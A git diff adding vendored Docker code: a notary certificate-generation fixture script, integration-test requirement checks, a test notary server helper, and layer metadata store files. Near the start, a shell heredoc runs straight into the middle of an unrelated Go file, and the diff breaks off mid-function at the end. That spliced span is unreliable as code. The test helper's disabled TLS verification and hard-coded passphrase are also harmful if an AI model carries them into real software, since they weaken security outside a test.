b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh new file mode 100755 index 0000000000..8d6381cec4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh @@ -0,0 +1,18 @@ +for selfsigned in delgkey1 delgkey2 delgkey3 delgkey4; do + subj='/C=US/ST=CA/L=SanFrancisco/O=Docker/CN=delegation' + + openssl genrsa -out "${selfsigned}.key" 2048 + openssl req -new -key "${selfsigned}.key" -out "${selfsigned}.csr" -sha256 -subj "${subj}" + cat > "${selfsigned}.cnf" < 1 && buf[0] == 'Y' + }, + "Test requires apparmor is enabled.", + } + RegistryHosting = testRequirement{ + func() bool { + // for now registry binary is built only if we're running inside + // container through `make test`. Figure that out by testing if + // registry binary is in PATH. + _, err := exec.LookPath(v2binary) + return err == nil + }, + fmt.Sprintf("Test requires an environment that can host %s in the same host", v2binary), + } + NotaryHosting = testRequirement{ + func() bool { + // for now notary binary is built only if we're running inside + // container through `make test`. Figure that out by testing if + // notary-server binary is in PATH. + _, err := exec.LookPath(notaryServerBinary) + return err == nil + }, + fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary), + } + NotaryServerHosting = testRequirement{ + func() bool { + // for now notary-server binary is built only if we're running inside + // container through `make test`. Figure that out by testing if + // notary-server binary is in PATH. + _, err := exec.LookPath(notaryServerBinary) + return err == nil + }, + fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary), + } + NotOverlay = testRequirement{ + func() bool { + return !strings.HasPrefix(daemonStorageDriver, "overlay") + }, + "Test requires underlying root filesystem not be backed by overlay.", + } + + Devicemapper = testRequirement{ + func() bool { + return strings.HasPrefix(daemonStorageDriver, "devicemapper") + }, + "Test requires underlying root filesystem to be backed by devicemapper.", + } + + IPv6 = testRequirement{ + func() bool { + cmd := exec.Command("test", "-f", "/proc/net/if_inet6") + + if err := cmd.Run(); err != nil { + return true + } + return false + }, + "Test requires support for IPv6", + } + UserNamespaceROMount = testRequirement{ + func() bool { + // quick case--userns not enabled in this test run + if os.Getenv("DOCKER_REMAP_ROOT") == "" { + return true + } + if _, _, err := dockerCmdWithError("run", "--rm", "--read-only", "busybox", "date"); err != nil { + return false + } + return true + }, + "Test cannot be run if user namespaces enabled but readonly mounts fail on this kernel.", + } + UserNamespaceInKernel = testRequirement{ + func() bool { + if _, err := os.Stat("/proc/self/uid_map"); os.IsNotExist(err) { + /* + * This kernel-provided file only exists if user namespaces are + * supported + */ + return false + } + + // We need extra check on redhat based distributions + if f, err := os.Open("/sys/module/user_namespace/parameters/enable"); err == nil { + defer f.Close() + b := make([]byte, 1) + _, _ = f.Read(b) + if string(b) == "N" { + return false + } + return true + } + + return true + }, + "Kernel must have user namespaces configured and enabled.", + } + NotUserNamespace = testRequirement{ + func() bool { + root := os.Getenv("DOCKER_REMAP_ROOT") + if root != "" { + return false + } + return true + }, + "Test cannot be run when remapping root", + } + IsPausable = testRequirement{ + func() bool { + if daemonPlatform == "windows" { + return isolation == "hyperv" + } + return true + }, + "Test requires containers are pausable.", + } + NotPausable = testRequirement{ + func() bool { + if daemonPlatform == "windows" { + return isolation == "process" + } + return false + }, + "Test requires containers are not pausable.", + } + IsolationIsHyperv = testRequirement{ + func() bool { + return daemonPlatform == "windows" && isolation == "hyperv" + }, + "Test requires a Windows daemon running default isolation mode of hyperv.", + } + IsolationIsProcess = testRequirement{ + func() bool { + return daemonPlatform == "windows" && isolation == "process" + }, + "Test requires a Windows daemon running default isolation mode of process.", + } +) + +// testRequires checks if the environment satisfies the requirements +// for the test to run or skips the tests. +func testRequires(c *check.C, requirements ...testRequirement) { + for _, r := range requirements { + if !r.Condition() { + c.Skip(r.SkipMessage) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_unix.go b/vendor/github.com/docker/docker/integration-cli/requirements_unix.go new file mode 100644 index 0000000000..ef017d8a76 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/requirements_unix.go @@ -0,0 +1,159 @@ +// +build !windows + +package main + +import ( + "bytes" + "io/ioutil" + "os/exec" + "strings" + + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/sysinfo" +) + +var ( + // SysInfo stores information about which features a kernel supports. + SysInfo *sysinfo.SysInfo + cpuCfsPeriod = testRequirement{ + func() bool { + return SysInfo.CPUCfsPeriod + }, + "Test requires an environment that supports cgroup cfs period.", + } + cpuCfsQuota = testRequirement{ + func() bool { + return SysInfo.CPUCfsQuota + }, + "Test requires an environment that supports cgroup cfs quota.", + } + cpuShare = testRequirement{ + func() bool { + return SysInfo.CPUShares + }, + "Test requires an environment that supports cgroup cpu shares.", + } + oomControl = testRequirement{ + func() bool { + return SysInfo.OomKillDisable + }, + "Test requires Oom control enabled.", + } + pidsLimit = testRequirement{ + func() bool { + return SysInfo.PidsLimit + }, + "Test requires pids limit enabled.", + } + kernelMemorySupport = testRequirement{ + func() bool { + return SysInfo.KernelMemory + }, + "Test requires an environment that supports cgroup kernel memory.", + } + memoryLimitSupport = testRequirement{ + func() bool { + return SysInfo.MemoryLimit + }, + "Test requires an environment that supports cgroup memory limit.", + } + memoryReservationSupport = testRequirement{ + func() bool { + return SysInfo.MemoryReservation + }, + "Test requires an environment that supports cgroup memory reservation.", + } + swapMemorySupport = testRequirement{ + func() bool { + return SysInfo.SwapLimit + }, + "Test requires an environment that supports cgroup swap memory limit.", + } + memorySwappinessSupport = testRequirement{ + func() bool { + return SysInfo.MemorySwappiness + }, + "Test requires an environment that supports cgroup memory swappiness.", + } + blkioWeight = testRequirement{ + func() bool { + return SysInfo.BlkioWeight + }, + "Test requires an environment that supports blkio weight.", + } + cgroupCpuset = testRequirement{ + func() bool { + return SysInfo.Cpuset + }, + "Test requires an environment that supports cgroup cpuset.", + } + seccompEnabled = testRequirement{ + func() bool { + return supportsSeccomp && SysInfo.Seccomp + }, + "Test requires that seccomp support be enabled in the daemon.", + } + bridgeNfIptables = testRequirement{ + func() bool { + return !SysInfo.BridgeNFCallIPTablesDisabled + }, + "Test requires that bridge-nf-call-iptables support be enabled in the daemon.", + } + bridgeNfIP6tables = testRequirement{ + func() bool { + return !SysInfo.BridgeNFCallIP6TablesDisabled + }, + "Test requires that bridge-nf-call-ip6tables support be enabled in the daemon.", + } + unprivilegedUsernsClone = testRequirement{ + func() bool { + content, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone") + if err == nil && strings.Contains(string(content), "0") { + return false + } + return true + }, + "Test cannot be run with 'sysctl kernel.unprivileged_userns_clone' = 0", + } + ambientCapabilities = testRequirement{ + func() bool { + content, err := ioutil.ReadFile("/proc/self/status") + if err == nil && strings.Contains(string(content), "CapAmb:") { + return true + } + return false + }, + "Test cannot be run without a kernel (4.3+) supporting ambient capabilities", + } + overlayFSSupported = testRequirement{ + func() bool { + cmd := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "cat /proc/filesystems") + out, err := cmd.CombinedOutput() + if err != nil { + return false + } + return bytes.Contains(out, []byte("overlay\n")) + }, + "Test cannot be run without suppport for overlayfs", + } + overlay2Supported = testRequirement{ + func() bool { + if !overlayFSSupported.Condition() { + return false + } + + daemonV, err := kernel.ParseRelease(daemonKernelVersion) + if err != nil { + return false + } + requiredV := kernel.VersionInfo{Kernel: 4} + return kernel.CompareKernelVersion(*daemonV, requiredV) > -1 + + }, + "Test cannot be run without overlay2 support (kernel 4.0+)", + } +) + +func init() { + SysInfo = sysinfo.New(true) +} diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars.go b/vendor/github.com/docker/docker/integration-cli/test_vars.go new file mode 100644 index 0000000000..97bcddd5f4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars.go @@ -0,0 +1,11 @@ +package main + +// sleepCommandForDaemonPlatform is a helper function that determines what +// the command is for a sleeping container based on the daemon platform. +// The Windows busybox image does not have a `top` command. +func sleepCommandForDaemonPlatform() []string { + if daemonPlatform == "windows" { + return []string{"sleep", "240"} + } + return []string{"top"} +} diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go new file mode 100644 index 0000000000..7633b346ba --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go @@ -0,0 +1,8 @@ +// +build !test_no_exec + +package main + +const ( + // indicates docker daemon tested supports 'docker exec' + supportsExec = true +) diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go new file mode 100644 index 0000000000..0845090524 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go @@ -0,0 +1,8 @@ +// +build test_no_exec + +package main + +const ( + // indicates docker daemon tested supports 'docker exec' + supportsExec = false +) diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go new file mode 100644 index 0000000000..2f47ab07a0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go @@ -0,0 +1,8 @@ +// +build !seccomp + +package main + +const ( + // indicates docker daemon built with seccomp support + supportsSeccomp = false +) diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go new file mode 100644 index 0000000000..00cf697209 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go @@ -0,0 +1,8 @@ +// +build seccomp + +package main + +const ( + // indicates docker daemon built with seccomp support + supportsSeccomp = true +) diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go b/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go new file mode 100644 index 0000000000..f9ecc01123 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go @@ -0,0 +1,14 @@ +// +build !windows + +package main + +const ( + // identifies if test suite is running on a unix platform + isUnixCli = true + + expectedFileChmod = "-rw-r--r--" + + // On Unix variants, the busybox image comes with the `top` command which + // runs indefinitely while still being interruptible by a signal. + defaultSleepImage = "busybox" +) diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go b/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go new file mode 100644 index 0000000000..bfc9a5a915 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go @@ -0,0 +1,15 @@ +// +build windows + +package main + +const ( + // identifies if test suite is running on a unix platform + isUnixCli = false + + // this is the expected file permission set on windows: gh#11395 + expectedFileChmod = "-rwxr-xr-x" + + // On Windows, the busybox image doesn't have the `top` command, so we rely + // on `sleep` with a high duration. + defaultSleepImage = "busybox" +) diff --git a/vendor/github.com/docker/docker/integration-cli/trust_server.go b/vendor/github.com/docker/docker/integration-cli/trust_server.go new file mode 100644 index 0000000000..18876311a1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/trust_server.go @@ -0,0 +1,344 @@ +package main + +import ( + "fmt" + "io/ioutil" + "net" + "net/http" + "os" + "os/exec" + "path/filepath" + "strings" + "time" + + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/go-connections/tlsconfig" + "github.com/go-check/check" +) + +var notaryBinary = "notary" +var notaryServerBinary = "notary-server" + +type keyPair struct { + Public string + Private string +} + +type testNotary struct { + cmd *exec.Cmd + dir string + keys []keyPair +} + +const notaryHost = "localhost:4443" +const notaryURL = "https://" + notaryHost + +func newTestNotary(c *check.C) (*testNotary, error) { + // generate server config + template := `{ + "server": { + "http_addr": "%s", + "tls_key_file": "%s", + "tls_cert_file": "%s" + }, + "trust_service": { + "type": "local", + "hostname": "", + "port": "", + "key_algorithm": "ed25519" + }, + "logging": { + "level": "debug" + }, + "storage": { + "backend": "memory" + } +}` + tmp, err := ioutil.TempDir("", "notary-test-") + if err != nil { + return nil, err + } + confPath := filepath.Join(tmp, "config.json") + config, err := os.Create(confPath) + if err != nil { + return nil, err + } + defer config.Close() + + workingDir, err := os.Getwd() + if err != nil { + return nil, err + } + if _, err := fmt.Fprintf(config, template, notaryHost, filepath.Join(workingDir, "fixtures/notary/localhost.key"), filepath.Join(workingDir, "fixtures/notary/localhost.cert")); err != nil { + os.RemoveAll(tmp) + return nil, err + } + + // generate client config + clientConfPath := filepath.Join(tmp, "client-config.json") + clientConfig, err := os.Create(clientConfPath) + if err != nil { + return nil, err + } + defer clientConfig.Close() + + template = `{ + "trust_dir" : "%s", + "remote_server": { + "url": "%s", + "skipTLSVerify": true + } +}` + if _, err = fmt.Fprintf(clientConfig, template, filepath.Join(cliconfig.ConfigDir(), "trust"), notaryURL); err != nil { + os.RemoveAll(tmp) + return nil, err + } + + // load key fixture filenames + var keys []keyPair + for i := 1; i < 5; i++ { + keys = append(keys, keyPair{ + Public: filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.crt", i)), + Private: filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.key", i)), + }) + } + + // run notary-server + cmd := exec.Command(notaryServerBinary, "-config", confPath) + if err := cmd.Start(); err != nil { + os.RemoveAll(tmp) + if os.IsNotExist(err) { + c.Skip(err.Error()) + } + return nil, err + } + + testNotary := &testNotary{ + cmd: cmd, + dir: tmp, + keys: keys, + } + + // Wait for notary to be ready to serve requests. + for i := 1; i <= 20; i++ { + if err = testNotary.Ping(); err == nil { + break + } + time.Sleep(10 * time.Millisecond * time.Duration(i*i)) + } + + if err != nil { + c.Fatalf("Timeout waiting for test notary to become available: %s", err) + } + + return testNotary, nil +} + +func (t *testNotary) Ping() error { + tlsConfig := tlsconfig.ClientDefault() + tlsConfig.InsecureSkipVerify = true + client := http.Client{ + Transport: &http.Transport{ + Proxy: http.ProxyFromEnvironment, + Dial: (&net.Dialer{ + Timeout: 30 * time.Second, + KeepAlive: 30 * time.Second, + }).Dial, + TLSHandshakeTimeout: 10 * time.Second, + TLSClientConfig: tlsConfig, + }, + } + resp, err := client.Get(fmt.Sprintf("%s/v2/", notaryURL)) + if err != nil { + return err + } + if resp.StatusCode != http.StatusOK { + return fmt.Errorf("notary ping replied with an unexpected status code %d", resp.StatusCode) + } + return nil +} + +func (t *testNotary) Close() { + t.cmd.Process.Kill() + os.RemoveAll(t.dir) +} + +func (s *DockerTrustSuite) trustedCmd(cmd *exec.Cmd) { + pwd := "12345678" + trustCmdEnv(cmd, notaryURL, pwd, pwd) +} + +func (s *DockerTrustSuite) trustedCmdWithServer(cmd *exec.Cmd, server string) { + pwd := "12345678" + trustCmdEnv(cmd, server, pwd, pwd) +} + +func (s *DockerTrustSuite) trustedCmdWithPassphrases(cmd *exec.Cmd, rootPwd, repositoryPwd string) { + trustCmdEnv(cmd, notaryURL, rootPwd, repositoryPwd) +} + +func trustCmdEnv(cmd *exec.Cmd, server, rootPwd, repositoryPwd string) { + env := []string{ + "DOCKER_CONTENT_TRUST=1", + fmt.Sprintf("DOCKER_CONTENT_TRUST_SERVER=%s", server), + fmt.Sprintf("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE=%s", rootPwd), + fmt.Sprintf("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE=%s", repositoryPwd), + } + cmd.Env = append(os.Environ(), env...) +} + +func (s *DockerTrustSuite) setupTrustedImage(c *check.C, name string) string { + repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + + if err != nil { + c.Fatalf("Error running trusted push: %s\n%s", err, out) + } + if !strings.Contains(string(out), "Signing and pushing trust metadata") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + if out, status := dockerCmd(c, "rmi", repoName); status != 0 { + c.Fatalf("Error removing image %q\n%s", repoName, out) + } + + return repoName +} + +func (s *DockerTrustSuite) setupTrustedplugin(c *check.C, source, name string) string { + repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name) + // tag the image and upload it to the private registry + dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", repoName, source) + + pushCmd := exec.Command(dockerBinary, "plugin", "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + + if err != nil { + c.Fatalf("Error running trusted plugin push: %s\n%s", err, out) + } + if !strings.Contains(string(out), "Signing and pushing trust metadata") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + if out, status := dockerCmd(c, "plugin", "rm", "-f", repoName); status != 0 { + c.Fatalf("Error removing plugin %q\n%s", repoName, out) + } + + return repoName +} + +func notaryClientEnv(cmd *exec.Cmd) { + pwd := "12345678" + env := []string{ + fmt.Sprintf("NOTARY_ROOT_PASSPHRASE=%s", pwd), + fmt.Sprintf("NOTARY_TARGETS_PASSPHRASE=%s", pwd), + fmt.Sprintf("NOTARY_SNAPSHOT_PASSPHRASE=%s", pwd), + fmt.Sprintf("NOTARY_DELEGATION_PASSPHRASE=%s", pwd), + } + cmd.Env = append(os.Environ(), env...) +} + +func (s *DockerTrustSuite) notaryInitRepo(c *check.C, repoName string) { + initCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "init", repoName) + notaryClientEnv(initCmd) + out, _, err := runCommandWithOutput(initCmd) + if err != nil { + c.Fatalf("Error initializing notary repository: %s\n", out) + } +} + +func (s *DockerTrustSuite) notaryCreateDelegation(c *check.C, repoName, role string, pubKey string, paths ...string) { + pathsArg := "--all-paths" + if len(paths) > 0 { + pathsArg = "--paths=" + strings.Join(paths, ",") + } + + delgCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), + "delegation", "add", repoName, role, pubKey, pathsArg) + notaryClientEnv(delgCmd) + out, _, err := runCommandWithOutput(delgCmd) + if err != nil { + c.Fatalf("Error adding %s role to notary repository: %s\n", role, out) + } +} + +func (s *DockerTrustSuite) notaryPublish(c *check.C, repoName string) { + pubCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "publish", repoName) + notaryClientEnv(pubCmd) + out, _, err := runCommandWithOutput(pubCmd) + if err != nil { + c.Fatalf("Error publishing notary repository: %s\n", out) + } +} + +func (s *DockerTrustSuite) notaryImportKey(c *check.C, repoName, role string, privKey string) { + impCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "key", + "import", privKey, "-g", repoName, "-r", role) + notaryClientEnv(impCmd) + out, _, err := runCommandWithOutput(impCmd) + if err != nil { + c.Fatalf("Error importing key to notary repository: %s\n", out) + } +} + +func (s *DockerTrustSuite) notaryListTargetsInRole(c *check.C, repoName, role string) map[string]string { + listCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "list", + repoName, "-r", role) + notaryClientEnv(listCmd) + out, _, err := runCommandWithOutput(listCmd) + if err != nil { + c.Fatalf("Error listing targets in notary repository: %s\n", out) + } + + // should look something like: + // NAME DIGEST SIZE (BYTES) ROLE + // ------------------------------------------------------------------------------------------------------ + // latest 24a36bbc059b1345b7e8be0df20f1b23caa3602e85d42fff7ecd9d0bd255de56 1377 targets + + targets := make(map[string]string) + + // no target + lines := strings.Split(strings.TrimSpace(out), "\n") + if len(lines) == 1 && strings.Contains(out, "No targets present in this repository.") { + return targets + } + + // otherwise, there is at least one target + c.Assert(len(lines), checker.GreaterOrEqualThan, 3) + + for _, line := range lines[2:] { + tokens := strings.Fields(line) + c.Assert(tokens, checker.HasLen, 4) + targets[tokens[0]] = tokens[3] + } + + return targets +} + +func (s *DockerTrustSuite) assertTargetInRoles(c *check.C, repoName, target string, roles ...string) { + // check all the roles + for _, role := range roles { + targets := s.notaryListTargetsInRole(c, repoName, role) + roleName, ok := targets[target] + c.Assert(ok, checker.True) + c.Assert(roleName, checker.Equals, role) + } +} + +func (s *DockerTrustSuite) assertTargetNotInRoles(c *check.C, repoName, target string, roles ...string) { + targets := s.notaryListTargetsInRole(c, repoName, "targets") + + roleName, ok := targets[target] + if ok { + for _, role := range roles { + c.Assert(roleName, checker.Not(checker.Equals), role) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/utils.go b/vendor/github.com/docker/docker/integration-cli/utils.go new file mode 100644 index 0000000000..87d48e41b0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/utils.go @@ -0,0 +1,79 @@ +package main + +import ( + "io" + "os" + "os/exec" + "time" + + "github.com/docker/docker/pkg/integration" + "github.com/docker/docker/pkg/integration/cmd" +) + +func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) { + if daemonPlatform == "windows" { + return "c:", `\` + } + return "", "/" +} + +// TODO: update code to call cmd.RunCmd directly, and remove this function +func runCommandWithOutput(execCmd *exec.Cmd) (string, int, error) { + result := cmd.RunCmd(transformCmd(execCmd)) + return result.Combined(), result.ExitCode, result.Error +} + +// TODO: update code to call cmd.RunCmd directly, and remove this function +func runCommandWithStdoutStderr(execCmd *exec.Cmd) (string, string, int, error) { + result := cmd.RunCmd(transformCmd(execCmd)) + return result.Stdout(), result.Stderr(), result.ExitCode, result.Error +} + +// TODO: update code to call cmd.RunCmd directly, and remove this function +func runCommand(execCmd *exec.Cmd) (exitCode int, err error) { + result := cmd.RunCmd(transformCmd(execCmd)) + return result.ExitCode, result.Error +} + +// Temporary shim for migrating commands to the new function +func transformCmd(execCmd *exec.Cmd) cmd.Cmd { + return cmd.Cmd{ + Command: execCmd.Args, + Env: execCmd.Env, + Dir: execCmd.Dir, + Stdin: execCmd.Stdin, + Stdout: execCmd.Stdout, + } +} + +func runCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) { + return integration.RunCommandPipelineWithOutput(cmds...) +} + +func convertSliceOfStringsToMap(input []string) map[string]struct{} { + return integration.ConvertSliceOfStringsToMap(input) +} + +func compareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error { + return integration.CompareDirectoryEntries(e1, e2) +} + +func listTar(f io.Reader) ([]string, error) { + return integration.ListTar(f) +} + +func randomTmpDirPath(s string, platform string) string { + return integration.RandomTmpDirPath(s, platform) +} + +func consumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) { + return integration.ConsumeWithSpeed(reader, chunkSize, interval, stop) +} + +func parseCgroupPaths(procCgroupData string) map[string]string { + return integration.ParseCgroupPaths(procCgroupData) +} + +func runAtDifferentDate(date time.Time, block func()) { + integration.RunAtDifferentDate(date, block) +} diff --git a/vendor/github.com/docker/docker/layer/empty.go b/vendor/github.com/docker/docker/layer/empty.go new file mode 100644 index 0000000000..3b6ffc82f7 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/empty.go @@ -0,0 +1,56 @@ +package layer + +import ( + "archive/tar" + "bytes" + "fmt" + "io" + "io/ioutil" +) + +// DigestSHA256EmptyTar is the canonical sha256 digest of empty tar file - +// (1024 NULL bytes) +const DigestSHA256EmptyTar = DiffID("sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef") + +type emptyLayer struct{} + +// EmptyLayer is a layer that corresponds to empty tar. +var EmptyLayer = &emptyLayer{} + +func (el *emptyLayer) TarStream() (io.ReadCloser, error) { + buf := new(bytes.Buffer) + tarWriter := tar.NewWriter(buf) + tarWriter.Close() + return ioutil.NopCloser(buf), nil +} + +func (el *emptyLayer) TarStreamFrom(p ChainID) (io.ReadCloser, error) { + if p == "" { + return el.TarStream() + } + return nil, fmt.Errorf("can't get parent tar stream of an empty layer") +} + +func (el *emptyLayer) ChainID() ChainID { + return ChainID(DigestSHA256EmptyTar) +} + +func (el *emptyLayer) DiffID() DiffID { + return DigestSHA256EmptyTar +} + +func (el *emptyLayer) Parent() Layer { + return nil +} + +func (el *emptyLayer) Size() (size int64, err error) { + return 0, nil +} + +func (el *emptyLayer) DiffSize() (size int64, err error) { + return 0, nil +} + +func (el *emptyLayer) Metadata() (map[string]string, error) { + return make(map[string]string), nil +} diff --git a/vendor/github.com/docker/docker/layer/empty_test.go b/vendor/github.com/docker/docker/layer/empty_test.go new file mode 100644 index 0000000000..c22da7665d --- /dev/null +++ b/vendor/github.com/docker/docker/layer/empty_test.go @@ -0,0 +1,46 @@ +package layer + +import ( + "io" + "testing" + + "github.com/docker/distribution/digest" +) + +func TestEmptyLayer(t *testing.T) { + if EmptyLayer.ChainID() != ChainID(DigestSHA256EmptyTar) { + t.Fatal("wrong ID for empty layer") + } + + if EmptyLayer.DiffID() != DigestSHA256EmptyTar { + t.Fatal("wrong DiffID for empty layer") + } + + if EmptyLayer.Parent() != nil { + t.Fatal("expected no parent for empty layer") + } + + if size, err := EmptyLayer.Size(); err != nil || size != 0 { + t.Fatal("expected zero size for empty layer") + } + + if diffSize, err := EmptyLayer.DiffSize(); err != nil || diffSize != 0 { + t.Fatal("expected zero diffsize for empty layer") + } + + tarStream, err := EmptyLayer.TarStream() + if err != nil { + t.Fatalf("error streaming tar for empty layer: %v", err) + } + + digester := digest.Canonical.New() + _, err = io.Copy(digester.Hash(), tarStream) + + if err != nil { + t.Fatalf("error hashing empty tar layer: %v", err) + } + + if digester.Digest() != digest.Digest(DigestSHA256EmptyTar) { + t.Fatal("empty layer tar stream hashes to wrong value") + } +} diff --git a/vendor/github.com/docker/docker/layer/filestore.go b/vendor/github.com/docker/docker/layer/filestore.go new file mode 100644 index 0000000000..42b45556e3 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/filestore.go @@ -0,0 +1,354 @@ +package layer + +import ( + "compress/gzip" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "regexp" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/ioutils" +) + +var ( + stringIDRegexp = regexp.MustCompile(`^[a-f0-9]{64}(-init)?$`) + supportedAlgorithms = []digest.Algorithm{ + digest.SHA256, + // digest.SHA384, // Currently not used + // digest.SHA512, // Currently not used + } +) + +type fileMetadataStore struct { + root string +} + +type fileMetadataTransaction struct { + store *fileMetadataStore + ws *ioutils.AtomicWriteSet +} + +// NewFSMetadataStore returns an instance of a metadata store +// which is backed by files on disk using the provided root +// as the root of metadata files. +func NewFSMetadataStore(root string) (MetadataStore, error) { + if err := os.MkdirAll(root, 0700); err != nil { + return nil, err + } + return &fileMetadataStore{ + root: root, + }, nil +} + +func (fms *fileMetadataStore) getLayerDirectory(layer ChainID) string { + dgst := digest.Digest(layer) + return filepath.Join(fms.root, string(dgst.Algorithm()), dgst.Hex()) +} + +func (fms *fileMetadataStore) getLayerFilename(layer ChainID, filename string) string { + return filepath.Join(fms.getLayerDirectory(layer), filename) +} + +func (fms *fileMetadataStore) getMountDirectory(mount string) string { + return filepath.Join(fms.root, "mounts", mount) +} + +func (fms *fileMetadataStore) getMountFilename(mount, filename string) string { + return filepath.Join(fms.getMountDirectory(mount), filename) +} + +func (fms *fileMetadataStore) StartTransaction() (MetadataTransaction, error) { + tmpDir := filepath.Join(fms.root, "tmp") + if err := os.MkdirAll(tmpDir, 0755); err != nil { + return nil, err + } + ws, err := ioutils.NewAtomicWriteSet(tmpDir) + if err != nil { + return nil, err + } + + return &fileMetadataTransaction{ + store: fms, + ws: ws, + }, nil +} + +func (fm *fileMetadataTransaction) SetSize(size int64) error { + content := fmt.Sprintf("%d", size) + return fm.ws.WriteFile("size", []byte(content), 0644) +} + +func (fm *fileMetadataTransaction) SetParent(parent ChainID) error { + return fm.ws.WriteFile("parent", []byte(digest.Digest(parent).String()), 0644) +} + +func (fm *fileMetadataTransaction) SetDiffID(diff DiffID) error { + return fm.ws.WriteFile("diff", []byte(digest.Digest(diff).String()), 0644) +} + +func (fm *fileMetadataTransaction) SetCacheID(cacheID string) error { + return fm.ws.WriteFile("cache-id", []byte(cacheID), 0644) +} + +func (fm *fileMetadataTransaction) SetDescriptor(ref distribution.Descriptor) error { + jsonRef, err := json.Marshal(ref) + if err != nil { + return err + } + return fm.ws.WriteFile("descriptor.json", jsonRef, 0644) +} + +func (fm *fileMetadataTransaction) TarSplitWriter(compressInput bool) (io.WriteCloser, error) { + f, err := fm.ws.FileWriter("tar-split.json.gz", os.O_TRUNC|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return nil, err + } + var wc io.WriteCloser + if compressInput { + wc = gzip.NewWriter(f) + } else { + wc = f + } + + return ioutils.NewWriteCloserWrapper(wc, func() error { + wc.Close() + return f.Close() + }), nil +} + +func (fm *fileMetadataTransaction) Commit(layer ChainID) error { + finalDir := fm.store.getLayerDirectory(layer) + if err := os.MkdirAll(filepath.Dir(finalDir), 0755); err != nil { + return err + } + + return fm.ws.Commit(finalDir) +} + +func (fm *fileMetadataTransaction) Cancel() error { + return fm.ws.Cancel() +} + +func (fm *fileMetadataTransaction) String() string { + return fm.ws.String() +} + +func (fms *fileMetadataStore) GetSize(layer ChainID) (int64, error) { + content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "size")) + if err != nil { + return 0, err + } + + size, err := strconv.ParseInt(string(content), 10, 64) + if err != nil { + return 0, err + } + + return size, nil +} + +func (fms *fileMetadataStore) GetParent(layer ChainID) (ChainID, error) { + content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "parent")) + if err != nil { + if os.IsNotExist(err) { + return "", nil + } + return "", err + } + + dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + if err != nil { + return "", err + } + + return ChainID(dgst), nil +} + +func (fms *fileMetadataStore) GetDiffID(layer ChainID) (DiffID, error) { + content, err := ioutil.ReadFile(fms.getLayerFilename(layer, 